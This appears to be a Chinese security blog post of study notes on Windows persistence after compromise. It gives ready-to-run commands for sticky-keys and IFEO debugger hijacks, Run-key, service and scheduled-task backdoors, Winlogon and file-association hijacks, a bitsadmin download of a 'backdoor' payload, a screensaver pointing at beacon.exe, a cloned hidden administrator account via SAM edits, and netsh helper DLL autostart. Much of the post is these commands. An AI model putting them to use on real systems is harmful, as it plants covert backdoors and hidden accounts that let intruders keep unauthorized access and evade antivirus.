<!DOCTYPE html>
<html lang="zh-cn" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="郁涛丶" />
  <meta name="description" content="" />
  
  
  <title>
    
      Windows权限维持学习 
      
      
      |
    
     郁涛丶&#39;s Blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/color-scheme.css">
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">
<link rel="stylesheet" href="/css/comments.css">

  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  <script>
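    // Re-apply the colour scheme persisted from an earlier visit, before the page paints.
    // `html` stays a page-level global (unchanged from the original) because other
    // inline scripts on the page may reference it — not verified here.
    var html = document.documentElement
    // Written by the theme's colour-mode toggle; null on a first visit, so nothing is applied.
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      // NOTE(review): the stored value is applied as-is; the set of values the stylesheet
      // honours is not visible here — confirm against color-scheme.css before restricting it.
      html.setAttribute('color-mode', colorMode)
    }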
  </script>
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="郁涛丶's Blog" type="application/atom+xml">
</head>


  <body>
    <div id="app">



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


    <!-- LaTeX display: MathJax is loaded below from cdn.jsdelivr.net without an integrity (SRI) attribute -->

  
    <script async type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>


        
            
                <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>



                    
                        
                                
                                        
                                                
                                                        
                                                            <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
                                                            <div class="container post-details" id="post-details">
                                                                <div class="post-content">
                                                                    <div class="post-title">
                                                                        Windows权限维持学习
                                                                    </div>
                                                                    <div class="post-attach">
                                                                        <span class="post-pubtime">
        <i class="iconfont icon-updatetime" title="Update time"></i>
        2022-03-08
      </span>

                                                                        <span class="post-pubtime"> 本文共2.5k字 </span>

                                                                        <span class="post-pubtime">
        大约需要14min
      </span>

                                                                        
                                                                                    <span class="post-categories">
        <i class="iconfont icon-bookmark" title="Categories"></i>
        
        <span class="span--category">
          <a href="/categories/Technology/" title="Technology">
            <b>#</b> Technology
          </a>
        </span>
                                                                                    
                                                                                        </span>
                                                                                        
                                                                            <span class="post-tags">
        <i class="iconfont icon-tags" title="Tags"></i>
        
        <span class="span--tag">
          <a href="/tags/%E6%B8%97%E9%80%8F/" title="渗透">
            <b>#</b> 渗透
          </a>
        </span>
                                                                            
                                                                                </span>
                                                                                
                                                                    </div>
                                                                    <div class="markdown-body">
                                                                        <p>[toc]</p>
<p>简单记录下Windows权限维持的内容。</p>
<h1 id="0x1-辅助功能镜像劫持"><a href="#0x1-辅助功能镜像劫持" class="headerlink" title="0x1 辅助功能镜像劫持"></a>0x1 辅助功能镜像劫持</h1><p>先前的版本可以直接更换：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">屏幕键盘： C:\Windows\System32\osk.exe</span><br><span class="line">放大镜： C:\Windows\System32\Magnify.exe</span><br><span class="line">旁白： C:\Windows\System32\Narrator.exe</span><br><span class="line">显示切换器 C:\Windows\System32\DisplaySwitch.exe</span><br><span class="line">应用切换器： C:\Windows\System32\AtBroker.exe</span><br></pre></td></tr></table></figure>

<p>直接命令行：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">copy c:\windows\system32\sethc.ex c:\windows\system32\sethc1.exe</span><br><span class="line">copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe</span><br></pre></td></tr></table></figure>

<p>高版本需要IFEO。所谓的IFEO就是Image File Execution Options，直译过来就是映像劫持。它又被称为“重定向劫持”（Redirection Hijack），它和“映像劫持”（Image Hijack，或IFEO Hijack）只是称呼不同，实际上都是一样的技术手段。白话来讲就是做某个操作的时候被拦截下来，干了别的事。</p>
<p>在iexplore.exe中加键值对：debugger  c:\windows\system32\cmd.exe</p>
<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308172433830.png" alt="image-20220308172433830"></p>
<p>或者直接命令行(需要管理员权限)：</p>
<p><code>reg add &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe&quot; /v &quot;Debugger&quot; /t REG_SZ /d &quot;c:\windows\system32\cmd.exe&quot; /f</code></p>
<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308172741639.png" alt="image-20220308172741639"></p>
<h1 id="0x2-启动项-x2F-服务后门"><a href="#0x2-启动项-x2F-服务后门" class="headerlink" title="0x2.启动项&#x2F;服务后门"></a>0x2.启动项&#x2F;服务后门</h1><h2 id="开始菜单启动项"><a href="#开始菜单启动项" class="headerlink" title="开始菜单启动项"></a>开始菜单启动项</h2><p>开始菜单启动项，指示启动文件夹的位置，具体的位置是“开始”菜单中的“所有程序”-“启动”选项：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\SD\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</span><br></pre></td></tr></table></figure>

<p>相关键值：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders </span><br><span class="line">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders </span><br><span class="line">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders </span><br><span class="line">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</span><br></pre></td></tr></table></figure>

<p>重启后会自动启动</p>
<h2 id="启动项注册表后门"><a href="#启动项注册表后门" class="headerlink" title="启动项注册表后门"></a>启动项注册表后门</h2><p><code>HKEY_CURRENT_USER</code>的改动不需要管理员权限。（更改<code>HKEY_LOCAL_MACHINE</code>需要管理员权限）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</span><br><span class="line">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</span><br><span class="line">HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</span><br><span class="line">HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308175519252.png" alt="image-20220308175519252"></p>
<p>同样，重启后会自启动。</p>
<p>使用命令行，修改hklm，需要管理员：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run   /v &quot;123&quot; /t REG_SZ /d &quot;C:\Windows\System32\cmd.exe&quot; /f</span><br></pre></td></tr></table></figure>

<h2 id="自启动服务后门"><a href="#自启动服务后门" class="headerlink" title="自启动服务后门"></a>自启动服务后门</h2><blockquote>
<p>  在 Windows上还有一个重要的机制，也就是服务。服务程序通常默默地运行在后台，且拥有 SYSTEM 权限，非常适合用于后门持久化。我们可以将 EXE &#x2F;DLL等可执行文件注册为服务实现后门持久化。</p>
</blockquote>
<p>可以通过如下命令行方式添加一个服务：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sc create asdfadfa binpath=   &quot;C:\Users\SD\Desktop\test.exe&quot;  start= &quot;auto&quot; obj=&quot;LocalSystem&quot;</span><br><span class="line">sc start asdfadfa </span><br></pre></td></tr></table></figure>

<p>删除服务：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc delete asdfadfa</span><br></pre></td></tr></table></figure>

<p>或者powershell：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">New-Service -Name &quot;pentestlab&quot; -BinaryPathName &quot;C:\temp\pentestlab.exe&quot; -Description &quot;PentestLaboratories&quot; -StartupType Automatic</span><br><span class="line">sc start pentestlab</span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308181535484.png" alt="image-20220308181535484"></p>
<h1 id="0x3-系统计划任务后门"><a href="#0x3-系统计划任务后门" class="headerlink" title="0x3.系统计划任务后门"></a>0x3.系统计划任务后门</h1><blockquote>
<p>  Windows实现定时任务主要有schtasks与at两种方式:</p>
<p>  At 适用于windows xp&#x2F;2003，Schtasks适用于win7&#x2F;2008或者以后</p>
</blockquote>
<p><code>taskschd.msc</code></p>
<p>5min执行一次</p>
<p><code>schtasks /create /sc minute /mo 5   /tn &quot;aaaa&quot; /tr C:\Windows\System32\cmd.exe</code></p>
<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308182919522.png" alt="image-20220308182919522"></p>
<h1 id="0x4-DLL劫持"><a href="#0x4-DLL劫持" class="headerlink" title="0x4.DLL劫持"></a>0x4.DLL劫持</h1><blockquote>
<p>  DLL劫持漏洞之所以被称为漏洞，还要从负责加载DLL的系统API LoadLibrary 来看。熟悉Windows代码的同学都知道，调用 LoadLibrary 时可以使用DLL的相对路径。这时，系统会按照特定的顺序搜索一些目录，以确定DLL的完整路径。根据MSDN文档的约定，在使用相对路径调用 LoadLibrary（同样适用于其他同类API，如 LoadLibraryEx、ShellExecuteEx 等）时，系统会依次从以下6个位置去查找所需要的DLL文件（会根据SafeDllSearchMode配置而稍有不同）。</p>
<ol>
<li>程序所在目录。</li>
<li>加载 DLL 时所在的当前目录。</li>
<li>系统目录即 SYSTEM32 目录。</li>
<li>16位系统目录即 SYSTEM 目录。</li>
<li>Windows目录。</li>
<li>PATH环境变量中列出的目录。</li>
</ol>
<p>  DLL劫持就发生在系统按照顺序搜索这些特定目录时。只要黑客能够将恶意的DLL放在优先于正常DLL所在的目录，就能够欺骗系统优先加载恶意DLL，来实现“劫持”。</p>
</blockquote>
<p>在win7及win7以上系统增加了KnownDLLs保护，需要在如下注册表下添加dll才能顺利劫持：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\ExcludeFromKnownDlls</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/225911">DLL劫持原理及其漏洞挖掘（一）</a></p>
<h1 id="0x5-Winlogon用户登录初始化"><a href="#0x5-Winlogon用户登录初始化" class="headerlink" title="0x5.Winlogon用户登录初始化"></a>0x5.Winlogon用户登录初始化</h1><p>winlogon.exe是Windows中非常重要的进程，在用户还没登录系统之前就已经存在，并与密码验证相关的重要任务密切相关。例如，当用户登录时，Winlogon 进程负责将用户配置文件加载到注册表中：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\</span><br><span class="line">HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</span><br></pre></td></tr></table></figure>

<p>命令行:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">reg delete &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v Userinit /f</span><br><span class="line">reg add &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot;  /v &quot;Userinit&quot; /t REG_SZ /d &quot;C:\Windows\system32\cmd.exe,&quot; /f</span><br></pre></td></tr></table></figure>

<p>powershell：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Set-ItemProperty   &quot;HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon&quot; -name   Userinit -value &quot;C:\Windows\system32\userinit.exe,C:\Windows\system32\cmd.exe&quot;</span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308184001989.png" alt="image-20220308184001989"></p>
<h1 id="0x6-Logon-Scripts后门"><a href="#0x6-Logon-Scripts后门" class="headerlink" title="0x6.Logon Scripts后门"></a>0x6.Logon Scripts后门</h1><p>Windows登录脚本，当用户登录时触发，<strong>Logon Scripts能够优先于杀毒软件执行，绕过杀毒软件对敏感操作的拦截</strong>。</p>
<p>注册表位置:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">HKEY_CURRENT_USER\Environment</span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308184533410.png" alt="image-20220308184533410"></p>
<h1 id="0x7-文件关联"><a href="#0x7-文件关联" class="headerlink" title="0x7.文件关联"></a>0x7.文件关联</h1><p>文件关联就是将一种类型的文件与一个可以打开它的程序建立起一种依存关系，一个文件可以与多个应用程序发生关联。</p>
<p>可以用assoc命令显示或修改文件扩展名关联，使用ftype显示或修改文件类型</p>
<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308185550636.png" alt="image-20220308185550636"></p>
<p>需要管理员权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg add &quot;HKCR\txtfile\shell\open\command&quot; /ve /t REG_EXPAND_SZ /d &quot;C:\Windows\system32\cmd.exe %1&quot; /f</span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308185838423.png" alt="image-20220308185838423"></p>
<h1 id="0x8-Bitsadmin"><a href="#0x8-Bitsadmin" class="headerlink" title="0x8.Bitsadmin"></a>0x8.Bitsadmin</h1><blockquote>
<p>  <a target="_blank" rel="noopener" href="https://toutiao.io/posts/bcz5e1o/preview">BITSAdmin的介绍与Windows渗透测试中的使用</a></p>
<p>  <a target="_blank" rel="noopener" href="https://micro8.gitbook.io/micro8/contents-1/41-50/41bitsadmin-yi-ju-hua-xia-zai-payload">bitsadmin一句话下载payload</a></p>
</blockquote>
<blockquote>
<p>  Windows操作系统包含各种实用程序，系统管理员可以使用它们来执行各种任务。这些实用程序之一是后台智能传输服务（BITS），它可以促进文件到Web服务器（HTTP）和共享文件夹（SMB）的传输能力。Microsoft提供了一个名为“ bitsadmin ” 的二进制文件和PowerShell cmdlet，用于创建和管理文件传输。</p>
</blockquote>
<p>Windows 7 及以上系统自带：<code>c:\windows\system32\bitsadmin.exe</code></p>
<p>使用 /transfer 参数下载文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.\bitsadmin.exe /transfer backdoor &quot;http://sssssssss/CM.EXE&quot; C:\1.exe</span><br></pre></td></tr></table></figure>

<p>复制本地文件：</p>
<p>BITSAdmin遵循文件传输的原则。因此，可以将其用作复制和粘贴命令。这意味着BITSAdmin也能将文件从同一台计算机上的一个位置传输到另一个位置。</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">bitsadmin /create whitehat_day <span class="comment">#创建一个whitehat_day的任务。</span></span><br><span class="line"><span class="comment">#使用/addfile参数将传输文件添加到whitehat_day任务中，并声明传输的文件名与路径，和保存位置与名称</span></span><br><span class="line">bitsadmin /addfile whitehat_day d:\file.txt d:\testfile.txt</span><br><span class="line">bitsadmin /resume whitehat_day<span class="comment">#使用/resume参数来开启传输。</span></span><br><span class="line">bitsadmin /complete whitehat_day<span class="comment">#以临时文件的形式传输文件。要获取完整的文件，需要使用/complete参数</span></span><br><span class="line">Get-ChildItem -Path d:\  <span class="comment">#查看目标路径下是否存在file.txt</span></span><br></pre></td></tr></table></figure>

<h1 id="0x9-屏幕保护程序"><a href="#0x9-屏幕保护程序" class="headerlink" title="0x9.屏幕保护程序"></a>0x9.屏幕保护程序</h1><blockquote>
<p>  利用前提:对方开启了屏幕保护</p>
<p>  屏幕保护程序，当初的设计是为了防止长期屏幕的显示，预防老化与缩短屏幕显示器老化的一种保护程序。</p>
</blockquote>
<p>注册表位置:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveActive</span><br><span class="line">HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaverIsSecure</span><br><span class="line">HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveTimeOut</span><br><span class="line">HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">reg add &quot;hkcu\control panel\desktop&quot; /v SCRNSAVE.EXE /d C:\Users\hunter\Desktop\beacon.exe /f</span><br><span class="line">reg add &quot;hkcu\control panel\desktop&quot; /v ScreenSaveActive /d 1 /f</span><br><span class="line">reg add &quot;hkcu\control panel\desktop&quot; /v ScreenSaverIsSecure /d 0 /f</span><br><span class="line">reg add &quot;hkcu\control panel\desktop&quot; /v ScreenSaveTimeOut /d 60 /f</span><br></pre></td></tr></table></figure>

<p>如果从未设置过屏保程序的话，除“ScreenSaveActive”默认值为1，其他键都是不存在的，而屏保程序的正常运行必须保证这几个键都有数据才可以，因此必须把4个键都重写一遍。另外，经测试屏保程序最短触发时间为60秒，即使改成小于60的数值，依然还是60秒后执行程序。<br>当然，从注册表路径也可以看出这种方式只能获得当前用户权限的shell，优点是不需要提权即可维持。</p>
<h1 id="0xA-WMI构造无文件后门（待完成）"><a href="#0xA-WMI构造无文件后门（待完成）" class="headerlink" title="0xA WMI构造无文件后门（待完成）"></a>0xA WMI构造无文件后门（待完成）</h1><p>WMI(Windows Management Instrumentation，即Windows管理规范)，大多数基于Windows的软件依赖于此服务。</p>
<blockquote>
<p>  <a target="_blank" rel="noopener" href="https://wooyun.js.org/drops/WMI%20%E7%9A%84%E6%94%BB%E5%87%BB%EF%BC%8C%E9%98%B2%E5%BE%A1%E4%B8%8E%E5%8F%96%E8%AF%81%E5%88%86%E6%9E%90%E6%8A%80%E6%9C%AF%E4%B9%8B%E6%94%BB%E5%87%BB%E7%AF%87.html">WMI的攻击，防御与取证分析技术之攻击篇</a></p>
<p>  <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2080">wmi与vbs</a></p>
<p>  <a target="_blank" rel="noopener" href="https://m0nst3r.me/pentest/%E5%88%A9%E7%94%A8WMI%E6%9E%84%E5%BB%BA%E4%B8%80%E4%B8%AA%E6%8C%81%E4%B9%85%E5%8C%96%E7%9A%84%E5%BC%82%E6%AD%A5%E7%9A%84%E6%97%A0%E6%96%87%E4%BB%B6%E5%90%8E%E9%97%A8.html">利用WMI构建一个持久化的异步的无文件后门</a></p>
<p>  <a target="_blank" rel="noopener" href="https://blog.51cto.com/antivirusjo/2092545">WMI利用专题</a></p>
<p>  <a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/88851">Powershell攻击指南黑客后渗透之道系列——进阶利用</a></p>
<p>  <a target="_blank" rel="noopener" href="https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html">A WMI Based Agentless Post-Exploitation RAT Developed in PowerShell</a></p>
<p>  <a target="_blank" rel="noopener" href="https://www.tuicool.com/articles/zmUVbyJ">WMI Backdoor</a></p>
<p>  <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor">Appendix L: Events to Monitor</a></p>
<p>  <a target="_blank" rel="noopener" href="http://demon.tw/copy-paste/vbs-wmi-trojan-3.html">利用WMI打造完美“三无”后门</a></p>
<p>  <a target="_blank" rel="noopener" href="https://www.tuicool.com/articles/IzieuyR">如何检测并移除WMI持久化后门？</a></p>
<p>  <a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/85851">解析APT29的无文件WMI和PowerShell后门</a></p>
<p>  <a target="_blank" rel="noopener" href="https://www.aqniu.com/learn/31053.html">无文件攻击的兴起与应对之道</a></p>
</blockquote>
<h1 id="0xB-影子用户"><a href="#0xB-影子用户" class="headerlink" title="0xB.影子用户"></a>0xB.影子用户</h1><p>即创建的隐藏用户，它无法通过普通命令进行查询，比较隐蔽。（需要管理员权限）</p>
<p>创建个隐藏用户</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">net user test$ 123456 /add</span><br><span class="line">net localgroup administrators test$ /add</span><br></pre></td></tr></table></figure>

<p>net user无法查看</p>
<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308193032710.png" alt="image-20220308193032710"></p>
<p>但是可以在计算机管理和登录页面中看到</p>
<p>下面解决这个问题：</p>
<p>修改<code>HKEY_LOCAL_MACHINE\SAM\SAM</code> admin的权限为完全控制和读取，重新打开后导出3个内容：</p>
<p>test$导出为1.reg<br>000003EC包含test$用户的F值，导出另存为2.reg<br>000003E9包含WIN10用户的F值，导出另存为3.reg</p>
<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308194155751.png" alt="image-20220308194155751"></p>
<p>将2.reg中的F值替换为3.reg中的F值，即将test$用户的F值替换为WIN10用户的F值.</p>
<p>删除test$用户，之后注册表就无法打开了，导入1、2两个注册表文件：</p>
<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308194707146.png" alt="image-20220308194707146"></p>
<p>这时登录界面已经没有账户了，3389可以直接登录，以test$用户登录，登录之后的身份是原来WIN10用户，桌面也是原用户的，达到克隆效果。这个时候再用<code>net user test$ /del</code>是删除不掉这个用户的，只能通过注册表来删除。</p>
<h1 id="0xC-Netsh"><a href="#0xC-Netsh" class="headerlink" title="0xC.Netsh"></a>0xC.Netsh</h1><p>权限要求：未降权的管理员权限。<br>netsh也是Windows自带的命令，是用来配置网络的命令行工具。该工具可以通过导入helper DLL的方式实现功能，且DLL导入后会写进注册表，永久有效。</p>
<p>关于<code>helper dll</code>的编写可以参考这个项目：<a target="_blank" rel="noopener" href="https://github.com/outflanknl/NetshHelperBeacon">NetshHelperBeacon</a></p>
<p>注册表位置：<code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh</code></p>
<p>netsh并不会开启自启动，因此还要再写一条自启动项：<br><code>reg add &quot;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&quot; /v Pentestlab /t REG_SZ /d &quot;cmd /c C:\Windows\System32\netsh&quot;</code></p>
<blockquote>
<p>  <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/9718">Windows权限维持总结</a></p>
<p>  <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/8095">Windows权限维持整理</a></p>
<p>  <a target="_blank" rel="noopener" href="https://bypass007.github.io/Emergency-Response-Notes/privilege/">权限维持篇</a></p>
<p>  <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/6461">windows中常见后门持久化方法总结</a></p>
</blockquote>

                                                                    </div>
                                                                    
                                                                        
                                                                </div>
                                                                




                                                                    
                                                                        
                                                            </div>
                                                            
        

      </div>

      <div class="tools-bar">



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
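    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    // Load the search index lazily on the first click, then drop the handler so
    // the index (and the `input` listener searchFunc attaches) is set up only once.
    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    // Swallow Enter so the key does nothing in the search box; results are
    // rendered on every `input` event instead. Read the handler's event argument
    // rather than the implicit global `event`, and prefer `key` over the
    // deprecated keyCode (kept as a fallback for older engines).
    inputArea.onkeydown = function(e) {
      var evt = e || window.event
      if (evt.key === 'Enter' || evt.keyCode == 13)
        return false
    }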

    // Toggle the search overlay. The `hidden` class is moved between the overlay
    // and <body>: while the overlay is visible the body carries `hidden`, and
    // vice versa.
    function openOrHideSearchContent() {
      var overlayNowHidden = searchOverlayArea.classList.toggle('hidden')
      document.body.classList.toggle('hidden', !overlayNowHidden)
    }

    // Close the overlay when the click lands on the overlay backdrop itself,
    // not on the search panel nested inside it.
    function blurSearchContent(e) {
      var clickedBackdrop = e.target === searchOverlayArea
      if (!clickedBackdrop) return
      openOrHideSearchContent()
    }

    // Both the toolbar icon and the close icon toggle the overlay; a click on
    // the backdrop closes it as well (see blurSearchContent).
    var toggleTriggers = ["#search-icon", "#search-close-icon"]
    toggleTriggers.forEach(function (selector) {
      document.querySelector(selector).addEventListener("click", openOrHideSearchContent, false)
    })
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

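    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      // Load the search index (an XML document of <entry> nodes, each with
      // <title>, <content> and <url>) from `path` once, then attach an `input`
      // listener to the element with id `search_id` that renders matching
      // entries into the element with id `content_id`.
      //
      // path:       URL of the XML index (e.g. "/search.xml").
      // search_id:  id of the text input that holds the query.
      // content_id: id of the container that receives the result markup.
      //
      // Everything rendered through innerHTML goes through escapeHtml first:
      // the query is typed by the user and the entries come from whatever the
      // index file contains, so neither is treated as trusted markup.
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);

      // Escape the characters that can break out of text or attribute context.
      function escapeHtml(text) {
        return String(text).replace(/[&<>"']/g, function (c) {
          return { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c];
        });
      }

      // Escape regex metacharacters so a query such as "c++" or "(" is matched
      // literally instead of throwing a SyntaxError or acting as a pattern.
      function escapeRegExp(text) {
        return text.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
      }

      // Wrap every keyword occurrence in `text` in the highlight span, escaping
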